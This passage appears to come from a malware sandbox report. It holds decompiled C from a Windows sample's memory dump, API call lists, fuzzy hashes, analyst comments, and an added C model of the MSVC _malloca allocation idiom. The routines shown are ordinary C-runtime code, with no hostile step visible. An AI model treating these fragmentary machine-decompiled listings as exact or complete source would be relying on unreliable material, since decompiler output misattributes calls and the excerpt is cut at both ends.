                                                  										goto L39;
                                                  									}
                                                  									_t227 = _v28;
                                                  									_t174 =  *((intOrPtr*)(0xb279f0 + _v20 * 4));
                                                  									__eflags =  *((char*)(_t174 + _t227 + 0x28));
                                                  									if( *((char*)(_t174 + _t227 + 0x28)) >= 0) {
                                                  										goto L41;
                                                  									}
                                                  									_t176 = GetConsoleMode(_v32,  &_v44);
                                                  									__eflags = _t176;
                                                  									if(_t176 == 0) {
                                                  										goto L41;
                                                  									}
                                                  									__eflags = _v5 - 2;
                                                  									if(_v5 != 2) {
                                                  										goto L42;
                                                  									}
                                                  									_t180 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
                                                  									__eflags = _t180;
                                                  									if(_t180 != 0) {
                                                  										_t225 = _a12;
                                                  										_t238 = _t237 + _v36 * 2;
                                                  										goto L45;
                                                  									}
                                                  									_t164 = GetLastError();
                                                  									goto L37;
                                                  								} else {
                                                  									 *((intOrPtr*)(E00AF69E3())) = 0xc;
                                                  									 *(E00AF69D0()) = 8;
                                                  									L38:
                                                  									_t238 = _t237 | 0xffffffff;
                                                  									__eflags = _t238;
                                                  									L39:
                                                  									L00AF4D62(_t242);
                                                  									return _t238;
                                                  								}
                                                  							}
                                                  							L15:
                                                  							 *(E00AF69D0()) =  *_t202 & _t242;
                                                  							 *((intOrPtr*)(E00AF69E3())) = 0x16;
                                                  							E00AF68BC();
                                                  							goto L38;
                                                  						}
                                                  						__eflags = _t151 != 1;
                                                  						if(_t151 != 1) {
                                                  							L13:
                                                  							_t159 = _a8;
                                                  							_v16 = _t219;
                                                  							_v12 = _t159;
                                                  							goto L21;
                                                  						}
                                                  						_t207 =  !_t219;
                                                  						__eflags = _t207 & 0x00000001;
                                                  						if((_t207 & 0x00000001) == 0) {
                                                  							goto L15;
                                                  						}
                                                  						goto L13;
                                                  					}
                                                  					L6:
                                                  					 *(E00AF69D0()) =  *_t147 & 0x00000000;
                                                  					 *((intOrPtr*)(E00AF69E3())) = 0x16;
                                                  					goto L59;
                                                  				} else {
                                                  					 *(E00AF69D0()) =  *_t208 & 0x00000000;
                                                  					_t141 = E00AF69E3();
                                                  					 *_t141 = 9;
                                                  					L60:
                                                  					return _t141 | 0xffffffff;
                                                  				}
                                                  			}
                                                  0x00af764f
                                                  0x00af770e
                                                  0x00af7714
                                                  0x00af7716
                                                  0x00af7789
                                                  0x00af7789
                                                  0x00af778d
                                                  0x00af779d
                                                  0x00af77a3
                                                  0x00af77a5
                                                  0x00af7801
                                                  0x00af7801
                                                  0x00af7809
                                                  0x00af780a
                                                  0x00af780c
                                                  0x00af7825
                                                  0x00af7828
                                                  0x00af7765
                                                  0x00af7766
                                                  0x00000000
                                                  0x00af776b
                                                  0x00af782e
                                                  0x00000000
                                                  0x00af782e
                                                  0x00af7813
                                                  0x00af781e
                                                  0x00000000
                                                  0x00af781e
                                                  0x00af77a7
                                                  0x00af77aa
                                                  0x00af77ad
                                                  0x00000000
                                                  0x00000000
                                                  0x00af77af
                                                  0x00af77af
                                                  0x00af77b2
                                                  0x00af77b5
                                                  0x00af77b8
                                                  0x00af77bf
                                                  0x00af77c4
                                                  0x00af77c6
                                                  0x00af77ca
                                                  0x00af77e5
                                                  0x00af77e9
                                                  0x00af77ea
                                                  0x00af77ed
                                                  0x00af77ee
                                                  0x00af77fa
                                                  0x00af77f0
                                                  0x00af77f0
                                                  0x00af77f0
                                                  0x00af77cc
                                                  0x00af77cc
                                                  0x00af77cc
                                                  0x00af77d7
                                                  0x00af77dc
                                                  0x00af77df
                                                  0x00af77df
                                                  0x00000000
                                                  0x00af77c4
                                                  0x00af771b
                                                  0x00af771e
                                                  0x00af7725
                                                  0x00af772a
                                                  0x00000000
                                                  0x00000000
                                                  0x00af7733
                                                  0x00af7739
                                                  0x00af773b
                                                  0x00000000
                                                  0x00000000
                                                  0x00af773d
                                                  0x00af7741
                                                  0x00000000
                                                  0x00000000
                                                  0x00af7755
                                                  0x00af775b
                                                  0x00af775d
                                                  0x00af7781
                                                  0x00af7784
                                                  0x00000000
                                                  0x00af7784
                                                  0x00af775f
                                                  0x00000000
                                                  0x00af75db
                                                  0x00af75e0
                                                  0x00af75eb
                                                  0x00af776c
                                                  0x00af776c
                                                  0x00af776c
                                                  0x00af776f
                                                  0x00af7770
                                                  0x00000000
                                                  0x00af7778
                                                  0x00af75d9
                                                  0x00af758e
                                                  0x00af7593
                                                  0x00af759a
                                                  0x00af75a0
                                                  0x00000000
                                                  0x00af75a0
                                                  0x00af7568
                                                  0x00af756b
                                                  0x00af7575
                                                  0x00af7575
                                                  0x00af7578
                                                  0x00af757b
                                                  0x00000000
                                                  0x00af757b
                                                  0x00af756f
                                                  0x00af7571
                                                  0x00af7573
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00af7573
                                                  0x00af751f
                                                  0x00af7524
                                                  0x00af752c
                                                  0x00000000
                                                  0x00af74b7
                                                  0x00af74bc
                                                  0x00af74bf
                                                  0x00af74c4
                                                  0x00af7851
                                                  0x00000000
                                                  0x00af7851

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8cb6b78fd284c8ac1786fc0e99a4ea119f198dc6d4589fc9c63c9561290be0c0
                                                  • Instruction ID: 801b6e757c39e4e819d4cf489cab811fd6429d96b8f2d310ffdb5025b3bdb7d3
                                                  • Opcode Fuzzy Hash: 8cb6b78fd284c8ac1786fc0e99a4ea119f198dc6d4589fc9c63c9561290be0c0
                                                  • Instruction Fuzzy Hash: C4C1BE74E0C24DAFDB12AFE8C885BBD7BB4AF19310F144199F650A7392CB749941CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 72%
                                                  			E00AE3970(void* __eflags, char* _a4, char* _a8) {
                                                  				short* _v8;
                                                  				int _v12;
                                                  				void* __ecx;
                                                  				void* __esi;
                                                  				int _t19;
                                                  				int _t27;
                                                  				void* _t33;
                                                  				int _t34;
                                                  				void* _t36;
                                                  				signed int _t42;
                                                  				int _t43;
                                                  				void* _t45;
                                                  				short* _t46;
                                                  				short* _t48;
                                                  
                                                  				_push(_t36);
                                                  				_push(_t36);
                                                  				_push(_t33);
                                                  				_push(_t45);
                                                  				_push(_t42);
                                                  				L00AF8C07(_t36, _t45);
                                                  				asm("sbb ebx, ebx");
                                                  				_t43 = _t42 | 0xffffffff;
                                                  				_t34 = _t33 + 1;
                                                  				_t46 = MultiByteToWideChar(_t34, 0, _a4, _t43, 0, 0);
                                                  				_v8 = _t46;
                                                  				if(_t46 != 0) {
                                                  					_t19 = MultiByteToWideChar(_t34, 0, _a8, _t43, 0, 0);
                                                  					_v12 = _t19;
                                                  					if(_t19 == 0) {
                                                  						goto L1;
                                                  					} else {
                                                  						_t48 = L00AF4D9C(_t36, _t19 + _t46 + _t19 + _t46);
                                                  						if(_t48 != 0) {
                                                  							_t27 = _v8;
                                                  							_v8 =  &(_t48[_t27]);
                                                  							if(MultiByteToWideChar(_t34, 0, _a4, _t43, _t48, _t27) == 0 || MultiByteToWideChar(_t34, 0, _a8, _t43, _v8, _v12) == 0) {
                                                  								E00AF69AD(GetLastError());
                                                  							} else {
                                                  								_t43 = E00AFF4A4(_t48, _v8);
                                                  							}
                                                  						}
                                                  						L00AF4D62(_t48);
                                                  					}
                                                  				} else {
                                                  					L1:
                                                  					E00AF69AD(GetLastError());
                                                  				}
                                                  				return _t43;
                                                  			}

                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(0000000B,00000000,?,74B05060,00000000,00000000,74B05060,74B60170,0000000A,?,?,?,00B1A177,test.dat,Bibek.dat), ref: 00AE3991
                                                  • GetLastError.KERNEL32(?,?,?,00B1A177,test.dat,Bibek.dat), ref: 00AE39A0
                                                  • __dosmaperr.LIBCMT ref: 00AE39A7
                                                  • MultiByteToWideChar.KERNEL32(0000000B,00000000,00B1A177,74B05060,00000000,00000000,?,?,?,00B1A177,test.dat,Bibek.dat), ref: 00AE39B8
                                                  • MultiByteToWideChar.KERNEL32(0000000B,00000000,?,74B05060,00000000,?,?,?,?,00B1A177,test.dat,Bibek.dat), ref: 00AE39E8
                                                  • MultiByteToWideChar.KERNEL32(0000000B,00000000,00B1A177,74B05060,?,?,?,?,?,00B1A177,test.dat,Bibek.dat), ref: 00AE39FF
                                                  • _free.LIBCMT ref: 00AE3A25
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$ErrorLast__dosmaperr_free
                                                  • String ID:
                                                  • API String ID: 3033228717-0
                                                  • Opcode ID: fc4dc1af28adf7b9bd2ce668542b472bc9aac9c73d63f56c4344763104a0d1fd
                                                  • Instruction ID: bbc54310697a3998ff57224b602bce52514a71bb4db64693f448c9892dd1b9d2
                                                  • Opcode Fuzzy Hash: fc4dc1af28adf7b9bd2ce668542b472bc9aac9c73d63f56c4344763104a0d1fd
                                                  • Instruction Fuzzy Hash: 5D219F7290020CBFEF205BB69C4CEBF7A7CEF897A0B104128FA01D3151DA318E108670
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 88%
                                                  			E00AFE1E5(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, intOrPtr* _a12, intOrPtr _a16) {
                                                  				struct _PROCESS_INFORMATION** _v4;
                                                  				struct _STARTUPINFOA** _v8;
                                                  				CHAR** _v12;
                                                  				void** _v16;
                                                  				long* _v20;
                                                  				int* _v24;
                                                  				struct _SECURITY_ATTRIBUTES** _v28;
                                                  				struct _SECURITY_ATTRIBUTES** _v32;
                                                  				CHAR** _v36;
                                                  				CHAR** _v40;
                                                  				void* __ecx;
                                                  				signed int _t34;
                                                  				intOrPtr* _t35;
                                                  				intOrPtr* _t36;
                                                  				void* _t38;
                                                  				void* _t40;
                                                  				void* _t43;
                                                  				intOrPtr* _t58;
                                                  				void* _t60;
                                                  				void* _t71;
                                                  				void* _t73;
                                                  				void* _t74;
                                                  				signed int _t78;
                                                  				struct _STARTUPINFOA** _t79;
                                                  				signed int _t81;
                                                  				signed int _t82;
                                                  				signed int _t88;
                                                  				signed int _t103;
                                                  				void* _t109;
                                                  				void* _t110;
                                                  				void* _t112;
                                                  				void* _t114;
                                                  				signed int _t118;
                                                  				signed int _t122;
                                                  				void* _t125;
                                                  				void* _t126;
                                                  				void* _t127;
                                                  
                                                  				_push(_t84);
                                                  				_push(__esi);
                                                  				_t118 = _a8;
                                                  				if(_t118 != 0) {
                                                  					if( *_t118 == 0) {
                                                  						goto L1;
                                                  					} else {
                                                  						_t35 = _a12;
                                                  						if(_t35 == 0) {
                                                  							goto L1;
                                                  						} else {
                                                  							_t36 =  *_t35;
                                                  							if(_t36 == 0 ||  *_t36 == 0) {
                                                  								goto L1;
                                                  							} else {
                                                  								_push(__ebx);
                                                  								_push(__edi);
                                                  								_t112 = E00B176D7(_t118, 0x5c);
                                                  								_t38 = E00B176D7(_t118, 0x2f);
                                                  								_t126 = _t125 + 0x10;
                                                  								_t78 = _t118;
                                                  								if(_t38 != 0) {
                                                  									if(_t112 == 0 || _t38 > _t112) {
                                                  										_t112 = _t38;
                                                  									}
                                                  									goto L19;
                                                  								} else {
                                                  									if(_t112 != 0) {
                                                  										L19:
                                                  										asm("sbb esi, esi");
                                                  										_t122 =  ~(_t118 - _t78) & _t78;
                                                  										if(E00B176D7(_t112, 0x2e) == 0) {
                                                  											_t88 = _t78;
                                                  											_t9 = _t88 + 2; // 0x2
                                                  											_t109 = _t9;
                                                  											do {
                                                  												_t40 =  *_t88;
                                                  												_t88 = _t88 + 2;
                                                  											} while (_t40 != 0);
                                                  											_t10 = (_t88 - _t109 >> 1) + 5; // 0x3
                                                  											_v8 = _t10;
                                                  											_t114 = E00AF4F03(_t88 - _t109 >> 1, _t10, 2);
                                                  											if(_t114 != 0) {
                                                  												_t79 = _v8;
                                                  												_t43 = E00B011FA(_t114, _t79, _t78);
                                                  												_t127 = _t126 + 0xc;
                                                  												if(_t43 == 0) {
                                                  													_v8 = _t114 + (_t79 + 0xfffffffb) * 2;
                                                  													_t58 = E00AF69E3();
                                                  													_t81 = L".com";
                                                  													_v12 =  *_t58;
                                                  													while(1) {
                                                  														_t60 = E00B011FA(_v8, 5, _t81);
                                                  														_t127 = _t127 + 0xc;
                                                  														if(_t60 != 0) {
                                                  															goto L38;
                                                  														}
                                                  														if(E00AFF377(_t81, _t122, _t114, _t60) == 0) {
                                                  															 *((intOrPtr*)(E00AF69E3())) = _v12;
                                                  															_t82 = E00AFE67B(_t81, _t114, _t122, _a4, _t114, _a12, _a16);
                                                  															goto L34;
                                                  														} else {
                                                  															_t81 = _t81 + 0xa;
                                                  															if(_t81 != 0xb1e3ac) {
                                                  																continue;
                                                  															} else {
                                                  																L00AF4D62(_t114);
                                                  																goto L32;
                                                  															}
                                                  														}
                                                  														goto L39;
                                                  													}
                                                  												}
                                                  												goto L38;
                                                  											} else {
                                                  												_t82 = _t78 | 0xffffffff;
                                                  												L34:
                                                  												L00AF4D62(_t114);
                                                  												goto L35;
                                                  											}
                                                  										} else {
                                                  											if(E00AFF377(_t78, _t122, _t78, 0) != 0) {
                                                  												L32:
                                                  												_t82 = _t81 | 0xffffffff;
                                                  											} else {
                                                  												_t82 = E00AFE67B(_t78, _t112, _t122, _a4, _t78, _a12, _a16);
                                                  											}
                                                  											L35:
                                                  											L00AF4D62(_t122);
                                                  											_t34 = _t82;
                                                  											goto L36;
                                                  										}
                                                  									} else {
                                                  										_t112 = E00B176D7(_t118, 0x3a);
                                                  										if(_t112 != 0) {
                                                  											goto L19;
                                                  										} else {
                                                  											_t103 = _t118;
                                                  											_t3 = _t103 + 2; // 0x2
                                                  											_t110 = _t3;
                                                  											do {
                                                  												_t71 =  *_t103;
                                                  												_t103 = _t103 + 2;
                                                  											} while (_t71 != _t112);
                                                  											_t4 = (_t103 - _t110 >> 1) + 3; // 0x1
                                                  											_t116 = _t4;
                                                  											_t78 = E00AF4F03(_t103 - _t110 >> 1, _t4, 2);
                                                  											if(_t78 != 0) {
                                                  												_t73 = E00B011FA(_t78, _t116, 0xb1e37c);
                                                  												_t127 = _t126 + 0xc;
                                                  												if(_t73 != 0) {
                                                   													L38:
                                                   													// Five zero arguments to a routine that does not return: the
                                                   													// report's subcall trace shows it ending in TerminateProcess,
                                                   													// and the int3 after the call is the compiler's padding after
                                                   													// a noreturn call. The CreateProcessA return that the
                                                   													// decompiler appends below is therefore not a path this
                                                   													// function can fall through to; treat its attribution here
                                                   													// with care when reading the APIs list.
                                                   													_push(0);
                                                   													_push(0);
                                                   													_push(0);
                                                   													_push(0);
                                                   													_push(0);
                                                   													E00AF68E9();
                                                   													asm("int3");
                                                   													return CreateProcessA( *_v40,  *_v36,  *_v32,  *_v28,  *_v24,  *_v20,  *_v16,  *_v12,  *_v8,  *_v4);
                                                  												} else {
                                                  													_t74 = E00B01125(_t78, _t116, _t118);
                                                  													_t127 = _t127 + 0xc;
                                                  													if(_t74 != 0) {
                                                  														goto L38;
                                                  													} else {
                                                  														_t5 = _t78 + 4; // 0x4
                                                  														_t112 = _t5;
                                                  														L00AF4D62(_t74);
                                                  														goto L19;
                                                  													}
                                                  												}
                                                  											} else {
                                                  												_t34 = L00AF4D62(_t72) | 0xffffffff;
                                                  												L36:
                                                  												goto L37;
                                                  											}
                                                  										}
                                                  									}
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  				} else {
                                                   					L1:
                                                   					// errno (reached through the pointer E00AF69E3 returns) set to 0x16 = EINVAL,
                                                   					// then the usual CRT invalid-parameter call, and the function returns -1
                                                   					 *((intOrPtr*)(E00AF69E3())) = 0x16;
                                                   					_t34 = E00AF68BC() | 0xffffffff;
                                                  					L37:
                                                  					return _t34;
                                                  				}
                                                  				L39:
                                                   			}

                                                  APIs
                                                  • _free.LIBCMT ref: 00AFE286
                                                    • Part of subcall function 00AF68E9: IsProcessorFeaturePresent.KERNEL32(00000017,00AF68BB,?,?,?,?,?,?,?,?,00AF68C8,00000000,00000000,00000000,00000000,00000000), ref: 00AF68EB
                                                    • Part of subcall function 00AF68E9: GetCurrentProcess.KERNEL32(C0000417), ref: 00AF690E
                                                    • Part of subcall function 00AF68E9: TerminateProcess.KERNEL32(00000000), ref: 00AF6915
                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00AFE426
                                                  Strings
                                                  Memory Dump Source
                                                   • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                   • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                   • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: Process$CreateCurrentFeaturePresentProcessorTerminate_free
                                                  • String ID: .com
                                                  • API String ID: 1469932949-4200470757
                                                  • Opcode ID: db68d646feadfd2fb2fbcb4777e10d0302ab92b0cfda5a266ca39aa159e274cc
                                                  • Instruction ID: c731dd7cad8e6c317c63c95240cfb83abd0c1e1ff835129197572b6557961979
                                                  • Opcode Fuzzy Hash: db68d646feadfd2fb2fbcb4777e10d0302ab92b0cfda5a266ca39aa159e274cc
                                                  • Instruction Fuzzy Hash: 9061033650020DAFDF24EFA8DC86DBB37A9EF49360B100268FB158B2B1EB71DC109651
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 70%
                                                  			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                                                  				signed int _v8;
                                                  				int _v12;
                                                  				void* _v24;
                                                  				signed int _t49;
                                                  				signed int _t54;
                                                  				int _t56;
                                                  				signed int _t58;
                                                  				short* _t60;
                                                  				signed int _t64;
                                                  				short* _t68;
                                                  				int _t76;
                                                  				short* _t79;
                                                  				signed int _t85;
                                                  				signed int _t88;
                                                  				void* _t93;
                                                  				void* _t94;
                                                  				int _t96;
                                                  				short* _t99;
                                                  				int _t101;
                                                  				int _t103;
                                                  				signed int _t104;
                                                  				short* _t105;
                                                  				void* _t108;
                                                  
                                                  				_push(__ecx);
                                                  				_push(__ecx);
                                                   				_t49 =  *0x412014; // 0x9e6834eb
                                                   				_v8 = _t49 ^ _t104; // /GS stack cookie: global cookie XOR frame pointer, checked again at L38 before the function returns
                                                  				_t101 = _a20;
                                                  				if(_t101 > 0) {
                                                  					_t76 = E004080DB(_a16, _t101);
                                                  					_t108 = _t76 - _t101;
                                                  					_t4 = _t76 + 1; // 0x1
                                                  					_t101 = _t4;
                                                  					if(_t108 >= 0) {
                                                  						_t101 = _t76;
                                                  					}
                                                  				}
                                                  				_t96 = _a32;
                                                  				if(_t96 == 0) {
                                                  					_t96 =  *( *_a4 + 8);
                                                  					_a32 = _t96;
                                                  				}
                                                   				// Size query (lpWideCharStr NULL, cchWideChar 0): returns the wide length of the input.
                                                   				// Flags are MB_PRECOMPOSED (1), plus MB_ERR_INVALID_CHARS (8) when _a36 is nonzero.
                                                   				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
                                                  				_v12 = _t54;
                                                  				if(_t54 == 0) {
                                                   					L38:
                                                   					E004018CC(); // cookie check on the way out (see _v8 above)
                                                   					return _t54;
                                                  				} else {
                                                   					_t93 = _t54 + _t54; // wide length in bytes
                                                   					_t83 = _t93 + 8; // plus an 8-byte header (MSVC _malloca idiom, see the 0xcccc / 0xdddd markers below)
                                                   					asm("sbb eax, eax"); // mask is zero only if the addition above wrapped
                                                   					if((_t93 + 0x00000008 & _t54) == 0) { // overflowed size is treated as an allocation failure
                                                  						_t79 = 0;
                                                  						__eflags = 0;
                                                  						L14:
                                                  						if(_t79 == 0) {
                                                  							L36:
                                                  							_t103 = 0;
                                                  							L37:
                                                  							E004063D5(_t79);
                                                  							_t54 = _t103;
                                                  							goto L38;
                                                  						}
                                                  						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
                                                  						_t119 = _t56;
                                                  						if(_t56 == 0) {
                                                  							goto L36;
                                                  						}
                                                  						_t98 = _v12;
                                                  						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
                                                  						_t103 = _t58;
                                                  						if(_t103 == 0) {
                                                  							goto L36;
                                                  						}
                                                   					// Flag 0x400 clear: the wide routine produces UTF-16 that must be converted back with
                                                   					// WideCharToMultiByte. Flag set: it produces byte data that is written straight to the
                                                   					// caller's buffer (the path after this block).
                                                   					if((_a12 & 0x00000400) == 0) {
                                                  							_t94 = _t103 + _t103;
                                                  							_t85 = _t94 + 8;
                                                  							__eflags = _t94 - _t85;
                                                  							asm("sbb eax, eax");
                                                  							__eflags = _t85 & _t58;
                                                  							if((_t85 & _t58) == 0) {
                                                  								_t99 = 0;
                                                  								__eflags = 0;
                                                  								L30:
                                                  								__eflags = _t99;
                                                  								if(__eflags == 0) {
                                                  									L35:
                                                  									E004063D5(_t99);
                                                  									goto L36;
                                                  								}
                                                  								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
                                                  								__eflags = _t60;
                                                  								if(_t60 == 0) {
                                                  									goto L35;
                                                  								}
                                                  								_push(0);
                                                  								_push(0);
                                                  								__eflags = _a28;
                                                  								if(_a28 != 0) {
                                                  									_push(_a28);
                                                  									_push(_a24);
                                                  								} else {
                                                  									_push(0);
                                                  									_push(0);
                                                  								}
                                                   								// The four ?? are the pushes above, in order: output buffer _a24 and its size _a28
                                                   								// (or 0, 0 for a size query), then NULL lpDefaultChar and NULL lpUsedDefaultChar.
                                                   								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
                                                  								__eflags = _t103;
                                                  								if(_t103 != 0) {
                                                  									E004063D5(_t99);
                                                  									goto L37;
                                                  								} else {
                                                  									goto L35;
                                                  								}
                                                  							}
                                                  							_t88 = _t94 + 8;
                                                  							__eflags = _t94 - _t88;
                                                  							asm("sbb eax, eax");
                                                  							_t64 = _t58 & _t88;
                                                  							_t85 = _t94 + 8;
                                                  							__eflags = _t64 - 0x400;
                                                  							if(_t64 > 0x400) {
                                                  								__eflags = _t94 - _t85;
                                                  								asm("sbb eax, eax");
                                                  								_t99 = E00403E3D(_t85, _t64 & _t85);
                                                  								_pop(_t85);
                                                  								__eflags = _t99;
                                                  								if(_t99 == 0) {
                                                  									goto L35;
                                                  								}
                                                   								 *_t99 = 0xdddd; // heap marker of the _malloca idiom: the release routine (E004063D5) frees only blocks carrying it
                                                  								L28:
                                                  								_t99 =  &(_t99[4]);
                                                  								goto L30;
                                                  							}
                                                  							__eflags = _t94 - _t85;
                                                  							asm("sbb eax, eax");
                                                  							E004018E0();
                                                  							_t99 = _t105;
                                                  							__eflags = _t99;
                                                  							if(_t99 == 0) {
                                                  								goto L35;
                                                  							}
                                                   							 *_t99 = 0xcccc; // stack marker: block came from the stack probe (E004018E0), nothing to free
                                                  							goto L28;
                                                  						}
                                                  						_t68 = _a28;
                                                  						if(_t68 == 0) {
                                                  							goto L37;
                                                  						}
                                                  						_t123 = _t103 - _t68;
                                                  						if(_t103 > _t68) {
                                                  							goto L36;
                                                  						}
                                                  						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
                                                  						if(_t103 != 0) {
                                                  							goto L37;
                                                  						}
                                                  						goto L36;
                                                  					}
                                                  					asm("sbb eax, eax");
                                                  					_t70 = _t54 & _t93 + 0x00000008;
                                                  					_t83 = _t93 + 8;
                                                  					if((_t54 & _t93 + 0x00000008) > 0x400) {
                                                  						__eflags = _t93 - _t83;
                                                  						asm("sbb eax, eax");
                                                  						_t79 = E00403E3D(_t83, _t70 & _t83);
                                                  						_pop(_t83);
                                                  						__eflags = _t79;
                                                  						if(__eflags == 0) {
                                                  							goto L36;
                                                  						}
                                                   						 *_t79 = 0xdddd; // heap marker (padded size above 0x400 went to E00403E3D, the heap allocator)
                                                  						L12:
                                                  						_t79 =  &(_t79[4]);
                                                  						goto L14;
                                                  					}
                                                  					asm("sbb eax, eax");
                                                  					E004018E0();
                                                  					_t79 = _t105;
                                                  					if(_t79 == 0) {
                                                  						goto L36;
                                                  					}
                                                   					 *_t79 = 0xcccc; // stack marker (padded size at most 0x400 went to the stack probe)
                                                  					goto L12;
                                                  				}
                                                  			}
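The allocation pattern repeated twice in the function above (wide length plus 8, a compare / sbb eax,eax / and sequence, a 0x400 threshold choosing between a stack probe and the heap allocator, a 0xCCCC or 0xDDDD word written at the start of the block, then the pointer advanced past four shorts) matches the MSVC CRT `_malloca` / `_freea` idiom. Recognising it lets an analyst skip that noise and read the function as an ANSI-to-wide-to-ANSI wrapper around the routine at E00405989. The C below is an added reference model written for this report, not code recovered from the sample: the constant names, the `marked_alloc` / `marked_free` names and the caller-supplied stack buffer (a real `_alloca` cannot outlive the function that calls it) are this example's own; the values are the ones the listing uses.

```c
#include <stdint.h>
#include <stdlib.h>

/* Added reference model of the small-buffer allocation idiom in the listing
 * above (MSVC CRT _malloca / _freea shape). Not code recovered from the
 * sample; the names are this example's own, the values are the listing's. */
#define HDR_SIZE      8u        /* header placed in front of the caller's bytes */
#define THRESHOLD     0x400u    /* at most this many bytes (incl. header) go on the stack */
#define MARKER_STACK  0xCCCCu   /* "*_t79 = 0xcccc" in the listing */
#define MARKER_HEAP   0xDDDDu   /* "*_t79 = 0xdddd" in the listing */

/* The cmp / sbb eax,eax / and sequence: size + 8, collapsed to 0 when the
 * addition wraps. The listing treats a zero result as allocation failure
 * instead of letting a wrapped small size reach the stack probe. */
uint32_t header_padded_size(uint32_t size)
{
    uint32_t total = size + HDR_SIZE;
    uint32_t mask = (total < size) ? 0u : 0xFFFFFFFFu;   /* what sbb leaves in eax */
    return total & mask;
}

/* The branch that sends the block to the heap allocator rather than the stack probe. */
int uses_heap(uint32_t size)
{
    uint32_t padded = header_padded_size(size);
    return padded != 0 && padded > THRESHOLD;
}

/* Allocation half of the idiom. The stack case is emulated with a buffer the
 * caller owns. Returns NULL exactly where the listing jumps to its failure
 * label (overflowed size, heap allocation failed, or stack buffer too small). */
void *marked_alloc(uint32_t size, void *stack_buf, size_t stack_buf_len)
{
    uint32_t padded = header_padded_size(size);
    uint16_t *hdr;

    if (padded == 0)
        return NULL;                       /* size overflowed */
    if (padded > THRESHOLD) {
        hdr = malloc(padded);
        if (hdr == NULL)
            return NULL;
        *hdr = MARKER_HEAP;
    } else {
        if (stack_buf == NULL || stack_buf_len < padded)
            return NULL;
        hdr = (uint16_t *)stack_buf;
        *hdr = MARKER_STACK;
    }
    return hdr + 4;                        /* "_t79 = &(_t79[4])": skip the 8-byte header */
}

/* Release half: read the marker eight bytes back and free() only heap blocks.
 * Returns the marker that was found so a caller can inspect the decision. */
uint16_t marked_free(void *p)
{
    uint16_t *hdr;
    uint16_t marker;

    if (p == NULL)
        return 0;
    hdr = (uint16_t *)p - 4;
    marker = *hdr;
    if (marker == MARKER_HEAP)
        free(hdr);
    return marker;
}
```

The overflow guard is the detail worth keeping in mind when reading the decompiled version: the masked size becomes zero rather than wrapping to a small positive value, which is why the listing compares the masked size against zero before it ever compares it against 0x400.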
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00407ab3
                                                  0x00407a2d
                                                  0x00407a30
                                                  0x00407a32
                                                  0x00407a34
                                                  0x00407a36
                                                  0x00407a39
                                                  0x00407a3e
                                                  0x00407a59
                                                  0x00407a5b
                                                  0x00407a65
                                                  0x00407a67
                                                  0x00407a68
                                                  0x00407a6a
                                                  0x00000000
                                                  0x00000000
                                                  0x00407a6c
                                                  0x00407a72
                                                  0x00407a72
                                                  0x00000000
                                                  0x00407a72
                                                  0x00407a40
                                                  0x00407a42
                                                  0x00407a46
                                                  0x00407a4b
                                                  0x00407a4d
                                                  0x00407a4f
                                                  0x00000000
                                                  0x00000000
                                                  0x00407a51
                                                  0x00000000
                                                  0x00407a51
                                                  0x004079e7
                                                  0x004079ec
                                                  0x00000000
                                                  0x00000000
                                                  0x004079f2
                                                  0x004079f4
                                                  0x00000000
                                                  0x00000000
                                                  0x00407a10
                                                  0x00407a14
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00407a1a
                                                  0x0040794d
                                                  0x0040794f
                                                  0x00407951
                                                  0x00407959
                                                  0x00407978
                                                  0x0040797a
                                                  0x00407984
                                                  0x00407986
                                                  0x00407987
